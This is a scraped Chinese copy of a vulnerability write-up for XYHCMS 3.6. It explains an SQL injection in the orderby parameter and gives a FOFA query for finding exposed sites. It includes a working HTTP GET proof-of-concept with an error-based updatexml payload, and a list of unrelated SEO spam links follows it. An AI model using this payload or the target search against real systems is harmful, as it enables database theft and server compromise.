当前位置: 首页 > news >正文

外综服务平台哪里做网站重庆seo网站系统

外综服务平台哪里做网站,重庆seo网站系统,描述电子商务网站建设,网站怎么做网页游戏0x01 产品简介 行云海cms是完全开源的一套CMS内容管理系统,简洁,易用,安全,稳定,免费。 0x02 漏洞概述 行云海cms中ThinkPHP在处理order by排序时可利用key构造SQL语句进行注入,LtController.class.php中发现传入了orderby未进行过滤导致sql注入。攻击者除了可以利用 SQL 注入…

0x01 产品简介

 行云海cms是完全开源的一套CMS内容管理系统,简洁,易用,安全,稳定,免费。

0x02 漏洞概述

 行云海cms中ThinkPHP在处理order by排序时可利用key构造SQL语句进行注入,LtController.class.php中发现传入了orderby未进行过滤导致sql注入。攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。

0x03 影响范围

 xyhcms 3.6版本

0x04 复现环境

FOFA:app="XYHCMS"

1f3ae77b60a24fd9926f11210ff9da08.png

0x05 漏洞复现

PoC

GET /index.php/Api/Lt/alist?orderby[updatexml(1,concat(0x3a,(select%20version()),0x3a),1);]=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept-Encoding: gzip

PS:PoC中报错注入的结果不会直接回显,但会写到日志里面,访问日志即可查看 

http://www.ds6.com.cn/news/61471.html

相关文章:

  • wordpress 页面模板不显示不出来seo基本概念
  • 学校门户网站的网站建设方案网页设计可以自学吗
  • 网站开发的付款方式必应搜索推广
  • django 做的网站爱站长尾词
  • 课程分销的网站怎么做软文写作公司
  • 网站建设订单网络营销期末考试试题及答案
  • 网站不被收录的原因seo优化收费
  • 怎么形容网站风格义乌最好的电商培训学校
  • wordpress 提问模板短视频seo厂家
  • 在哪里找人做公司网站企业网站seo点击软件
  • 网站排名掉了seo优化人员
  • 部队网站建设方案全网整合营销
  • 网站建设怎么添加评论服务营销策略
  • 品牌网站推广方案济南疫情最新情况
  • 个人网站注册成都seo的方法
  • 外贸论坛网站有哪些百度推广关键词技巧定价
  • 节水网站建设网站搜索排名优化
  • 网店推广技巧泰安seo公司
  • 网站开发转软件开发seo快速排名点击
  • 个人什么取消网站备案成都百度推广电话号码是多少
  • wordpress 全站ssl店铺推广软文500字
  • 广州网站建设定制哪家口碑好最近发生的热点事件
  • 网站怎么做图片滚动条网络营销郑州优化推广公司
  • 天津 网站建设公司网络外贸推广
  • 下载公众号郑州网站建设方案优化
  • 公司网站是做的谷歌的html网页制作代码
  • 做文化建设的网站百度营业执照怎么办理
  • 做seo哪些网站会好点seo网站搭建是什么
  • css用代码做网站国内电商平台有哪些
  • 去哪里找做网站的人seo下载站